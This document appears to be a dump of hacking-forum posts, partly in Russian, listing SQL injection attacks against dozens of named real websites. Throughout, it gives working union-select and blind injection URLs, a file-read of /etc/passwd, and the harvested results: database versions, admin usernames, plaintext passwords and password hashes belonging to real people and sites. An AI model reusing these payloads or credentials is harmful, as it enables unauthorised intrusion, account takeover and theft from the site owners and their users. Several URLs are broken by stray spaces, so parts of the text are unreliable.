_http://www.aussiepcshop.com/product_info.php/cPath/44/products_id/161' _http://woohoo.aussiepcshop.com/phpmyadmin/ _http://payments.aussiepcshop.com/phpmyadmin/index.php ----------------------------- _http://www.airsideshop.com/product.php?id=316%20order%20by%204+--+ ----------------------------- _http://www.tannenbaumholidayshop.com/store.cfm?SearchType=Cat&Searchterm=11' ----------------------------- _http://www.knifeshop.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1&kat_aktiv=357&Ziel_ID=4310'&javascript_enabled=true&PEPPERSESS=65df5b010c16ad29aef8f3519684b2f5&w=1366&h=716#Ziel4310 ----------------------------- _http://www.worstpreviews.com/review.php?id=67' ----------------------------- _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,host),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+limit+6,1/* _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,USER(),VERSION(),DATABASE()),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* web@localhost :: 4.0.15-log :: century _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+limit+0,1/* root::2e4fe35a29f3f92f::herbert rick::5c96ea97620d605c:: mdcback::43334d0c52429114::backup florian::2941613d4db7badf:: testuser::7dcda0d57290b453::testpass florian2::2941613d4db7badf:: flowb::43b140e955182c71:: david:: _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,user,host),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+limit+0,1/* florian::% florian2::% sethh::% testuser::% tony::% flowb::207.22.66.13 replicant::207.22.66.178 david::207.22.66.230 mediatwo::207.22.66.27 mediatwo::207.22.66.71 web::69.7.74.77 david::ats david::localhost mdc_sync::localhost ------------------------------- _http://www.trikeshop.com/shop_details.php?id=270+order+by+10/* _http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,concat_ws(0x3a3a,VERSION(),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 4.1.20-log :: [email protected] :: 334558_trikeshop _http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+news/* ------------------------------- _http://www.krsaddleshop.com/jump.jsp?itemType=CATEGORY&itemID=21'&path=1 ------------------------------- _http://www.wowshop.com.ua/index.php?productID=640' ------------------------------- _http://www.broderbund.com/jump.jsp?itemID=1670'&mainPID=1670&itemType=PRODUCT&path=1%2C2%2C6%2C413&iProductID=1670 ------------------------------- _http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=89+order+by+100/* _http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a3a,VERSION(),DATABASE(),USER()),16,17/* _http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,username,password,12,13,14,concat_ws(0x3a3a,VERSION(),DATABASE(),USER()),16,17+from+user+limit+0,1/* tomsalinsky:0b37d5345cdb88b60219337856bc0256::slithy deborah, 2fe7cec3131fa9662906ecfb2eac8a49::moose 4.1.20::the-spontaneity-shop_com::tom@localhost -------------------------------- _http://www.dutchtradeshop.com/store/itemDetail.php?itemID=10023' -------------------------------- _http://www.lobbsfarmshop.com/ShowDetails.asp?id=1794' -------------------------------- _http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--#p _http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+from+information_schema.columns--#p _http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_name+NOT+IN+('ProductTbl~bak',%20'CategoryTbl','CategoryTbltest','CategoryTypeTbl','CategoryTypeTbltest','emailTBL','emailTbltest','Order_Details','Order_Detailstest','OrderTbl','OrderTbltest','PricingTbl','PricingTbl~bak','PricingTblA','PricingTbltest','ProductTbl','ProductTblA','ProductTbltest','TestTBL','TrayPricingTbl','TreeList_Tmp','sysconstraints','syssegments'))-- http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+column_name+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='OrderTbl'+AND+column_name+NOT+IN+('orderID',%20'Name','Address1','Address2','City','State','Zip','Country','Phone','Mobile','Email'))-- Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ---------------------------------- _http://www.waltsbikeshop.com/outdoors/products/12/1081%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*/ _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,VERSION(),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*/ 4.1.20::waltben4_walt@localhost::waltben4_publicWeb _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20users/*/ _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20news/*/ _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,user_login,user_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20users%20limit%200,1/*/ concat_ws(0x3a3a,user_id,user_login,user_password) 2::mdbendel::jgarcia <------ administrator 31::bikeguybob::kyle 44::lindsay::june078 9::dave::dave 10::sarah::lea 14::zach::shannon 16::cortez::cortez 29::shannoncanfield::bikes 30::jds::suckme 31::bikeguybob::kyle 33::mountainbkr14::viper 35::kdp::123 43::jdames::itsugar1 41::rex::theodore 42::cirvin::chrisbirvin 45::david::djszp5 46::mgwvd3::garth131 37::quickfeet18::dave11 40::will.verbarg::02291984 _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,user_id,user_login,user_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20users%20where%20user_id=2/*/ _http://www.waltsbikeshop.com/admin/index.php --------------------------------- _http://www.graysflowershop.com/view-category.asp?cid=4' --------------------------------- _http://www.oldsweetshop.com/products.asp?CatID=127'&p=0 --------------------------------- _http://www.bagshop.com/store/cart_pages/gift_certficates.php?ID=4468' --------------------------------- _http://www.fentonartglass.com/shop/item.asp?item=DS197KI'%20OR%201=@@version-- --------------------------------- _http://www.1stopmarineshop.com/product_info.php?cPath=1607958'&products_id=20794484 --------------------------------- _http://www.dropshop.com/db/npwd_db_detail.php3?id_producto=51797' --------------------------------- _http://www.goldenmagnolia.com/deutsch/go.php?kategorieID=130'&no=1 ---------------------------------
tm.die-webber.com Code: http://tm.die-webber.com/tools/?login=narks1%22+UNION+SELECT+1,2,column_name,4,5,6,7,8,9+FROM+information_schema.columns+LIMIT+0,1/* таблы и пару ячеек Code: compteur_visite (compteur,date,time,duree,ip) tmu_banlist tmu_boosters tmu_boostersUpdate tmu_challengers tmu_challenges tmu_players (login,nickname,path,team1,team2,team3,team4,team,update) tmu_servers tmu_teams tmu_tracks tmu_votes
Code: http://www.infn.it/news/newsen.php?id=-390+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* PR8 Тиц 650 Все таблицы просмотрел, ничего полезного не нашёл. Может у вас получится.
http://at.kz/?p=-1+union+select+1,2,version()/* 5.0.18-log http://at.kz/?p=-1+union+select+1,2,table_name+from+INFORMATION_SCHEMA.TABLES+limit+16,1/* есть таблица контент content И ВСЕ )))
www.computerworld.com.ua тИЦ = 130; PR = 5 Code: http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(version(),char(0x3A),database(),char(0x3A),user()),7,8,9,10,11,12,13,14,15/* version() - 4.1.22-log database() - comizdat3 user() - [email protected] Code: http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(login,char(0x3A),password),7,8,9,10,11,12,13,14,15+from+admin+limit+0,1/* admin:sdbgsbglodstre ----------------------------------------------------- www.russian.kiev.ua тИЦ = 230; PR = 4 Code: http://www.russian.kiev.ua/book.php?id=-1+union+select+version(),2,3,user(),5,6,database(),8,9,10,11-- version() - 5.0.67-log user() - [email protected] database() - russian есть таблица с паролями: Code: http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),login,char(0x3A),passwd),2,3,4,5,6,7,8,9,10,11+from+tbl_users+limit+0,1-- 17:root:root форум phpbb, но он не работает Code: http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),username,char(0x3A),user_password),2,3,4,5,6,7,8,9,10,11+from+phpbb_users+where+user_level=1+limit+0,1-- 2:admin_admin:0192023a7bbd73250516f069df18b500 ----------------------------------------------------- www.videotor.com тИЦ = 30; PR = 1 Code: http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(version(),char(0x3A),database(),char(0x3A),user())/* version() - 5.0.45 database() - videotor_blog user() - videotor@localhost Code: http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(login,char(0x3A),password)+from+users+limit+0,1/* Bot:ghbpthdfnbd Slayer:COUNTer oleg:ghbpthdfnbd sergey:kiskis
Шопчег. Дисками торгует. http://www.dirtcheapcds.com.au/viewContent.php?id=-31+union+select+1,2,concat_ws(0x3A3a,version(),database()),4,5/* 4.0.24_Debian-10ubuntu2-log::dirtcheap_db
http://www.spomir.ru/rass/spo_out&action=view_archive&id=-1%20union%20select%201,version(),3,4,5,6,7 Смотрим в хедер)
http://www.youplusw ephotography.com/blog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password,re g_date,last_date,sess),3+from+user s+limit+1,1-- http://tripleco rd.com/news/index.php?link=73&cat=-2+union+select+1,concat_ws(0x3a,login,password),3+from+users+limit+1,1-- http://www.kevin swan.com/slog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password),3+from+users-- http://www.shar alana.com/blog/index.php?link=20&cat=-4+union+select+1,concat_ws(0x3a,login,password),3+from+users-- http://www.beb bblog.com/index.php?category=-4+union+select+1,concat_ws(0x3a,login,password),3+from+users/*
Code: http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(58),username,password)+using+utf8),4,null,6,null,8,9+from+login-- логин/пасс: Code: admin:mbreti ------------------------------------------- Code: http://www.gazeta-standard.com/tekst.php?idt=6342+and+1=2+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+editor-- логин/пасс: Code: admin:62a90ccff3fd73694bf6281bb234b09a ------------------------------------------- Code: http://www.gazetaetiranes.com.al/print.php?lajmID=922'+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14+from+user/* логин/пасс: Code: admin-gt:2fa4b2f3e0acb4e59e02d060db05da74 ---------------------------------------------- Code: http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58),name,pass),6,7,8,9+from+users+limit+1,1/* логин/пасс: Code: drupal:9536bdcd9e3faa581d6991b5d04ac4ec -------------------------------------------- Code: http://www.ktpae.gr/declaration_more.php?decl_id=-172+union+select+1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+mysql.user/* логин/пасс: Code: root:*3225EBFDCE9E60181BB8157769BC1EF316DC15D0 --------------------------------------------- The End!
http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr(version(),1,1)))=53--%20 5 ветка http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr((select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+16,1),1,1)))=118--%20 т.е имя 16 таблицы начинается с буквы 'v', view))) ну и так далее? как говориться курочка по зернышку....)
Code: http://www.comingsoon.net/films.php?id=11750+and+ascii(lower(substring(user(),1,1)))<=100+#+ user: comingso_nextra database: comingso_nextra version: 4 не дает юзать union select.
http://deti.mail.ru/nyanya?type=2+and+substring(version(),1,1)=4 version(): 4.0 http://deti.mail.ru/lineyki?edit=[id вашей созданной линейки]+and+substring(version(),1,1)=4
http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,TABLE_NAME),4,5+from+information_schema.tables+l imit+25,2/* --------------------------------- table: usuario votos_final voto video ultimasvisitas postcomentario post perfil foto CHARACTER_SETS experiencia ed_languages ed_countries_text comentario VIEWS USER_PRIVILEGES TRIGGERS TABLE_PRIVILEGES TABLE_CONSTRAINTS TABLES STATISTICS SCHEMA_PRIVILEGES SCHEMATA ROUTINES KEY_COLUMN_USAGE COLUMN_PRIVILEGES COLUMNS COLLATION_CHARACTER_SET_APPLICABILITY COLLATIONS CHARACTER_SETS ---------------------- column: COLLATION_NAME MAXLEN DESCRIPTION DEFAULT_COLLATE_NAME CHARACTER_SET_NAME http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,login,password),4,5+from+usuario+ limit+0,1/*
http://www.librenet.net/forum/post.php?id_post=652+union+select+1,2,concat_ws(0x3a3a,COLUMN_NAME),4,5,6,7,8+from+inf ormation_schem a.columns/*&id_topic=41 http://www.librenet.net/forum/post.p hp?id_post=652+union+select+1,2,concat_ws(0x3a3a,pass_user,login_user),4,5,6,7,8+from +user/*&id_topic=41 columnass_user login_user table:USER_PRIVILEGES administre_serveur moderation user c3dric::6cc8260ee2bcc56083a35cd98b775f02(23041983)
http://belarusgo.com/view_subsection.php?page=2&id_subsection=68&id_city=9&id_section=-13+union+s elect+1,2,concat_ws(0x3a3a,login_user,password_user),4,5,6 +from+user--
